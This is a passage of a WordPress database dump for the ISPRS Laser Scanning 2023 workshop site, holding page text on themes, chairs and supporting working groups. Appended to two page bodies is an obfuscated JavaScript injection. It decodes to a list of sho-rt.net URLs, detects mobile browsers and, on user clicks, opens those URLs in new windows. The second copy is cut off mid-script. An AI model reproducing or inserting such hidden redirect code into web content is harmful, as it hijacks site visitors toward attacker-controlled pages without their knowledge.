terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u> </u></p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Scientific Committee:</u></h5>\n<p>tbc.</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 16:35:30','2022-11-02 16:35:30','',2949,'https://gsw2023.com/?p=2958',0,'revision','',0),
(2959,1,'2022-11-02 16:41:09','2022-11-02 16:41:09','','Bisheng Yang,<br>LIESMARS Wuhan University,<br>China<br>(WG II/2)','','publish','open','closed','','bisheng-yangliesmars-wuhan-universitychinawg-ii-2','','','2022-11-02 16:44:45','2022-11-02 16:44:45','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2959',0,'dt_team','',0),
(2960,1,'2022-11-02 16:40:27','2022-11-02 16:40:27','','w172','','inherit','open','closed','','w172','','','2022-11-02 16:40:27','2022-11-02 16:40:27','',2959,'https://gsw2023.com/wp-content/uploads/2022/11/w172.jpg',0,'attachment','image/jpeg',0),
(2961,1,'2022-11-02 16:42:25','2022-11-02 16:42:25','','Martin Weinmann,<br>KIT,<br>Germany','','publish','open','closed','','martin-weinmannkitgermany','','','2022-11-02 16:44:55','2022-11-02 16:44:55','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2961',0,'dt_team','',0),
(2962,1,'2022-11-02 16:41:50','2022-11-02 16:41:50','','w173','','inherit','open','closed','','w173','','','2022-11-02 16:41:50','2022-11-02 16:41:50','',2961,'https://gsw2023.com/wp-content/uploads/2022/11/w173.jpg',0,'attachment','image/jpeg',0),
(2963,1,'2022-11-02 16:43:14','2022-11-02 16:43:14','','Katarina Anders,<br>University of Heidelberg, Germany','','publish','open','closed','','katarina-andersuniversity-of-heidelberg-germany','','','2022-11-02 16:45:04','2022-11-02 16:45:04','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2963',0,'dt_team','',0),
(2964,1,'2022-11-02 16:43:08','2022-11-02 16:43:08','','w174','','inherit','open','closed','','w174','','','2022-11-02 16:43:08','2022-11-02 16:43:08','',2963,'https://gsw2023.com/wp-content/uploads/2022/11/w174.jpg',0,'attachment','image/jpeg',0),
(2965,1,'2022-11-02 16:44:03','2022-11-02 16:44:03','','Ruisheng Wang,<br>University of Calgary, Canada','','publish','open','closed','','ruisheng-wanguniversity-of-calgary-canada','','','2022-11-02 16:45:14','2022-11-02 16:45:14','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2965',0,'dt_team','',0),
(2966,1,'2022-11-02 16:43:45','2022-11-02 16:43:45','','w175','','inherit','open','closed','','w175','','','2022-11-02 16:43:45','2022-11-02 16:43:45','',2965,'https://gsw2023.com/wp-content/uploads/2022/11/w175.jpg',0,'attachment','image/jpeg',0),
(2967,1,'2022-11-02 16:49:33','2022-11-02 16:49:33','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u> </u></p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Scientific Committee:</u></h5>\n<p>tbc.</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 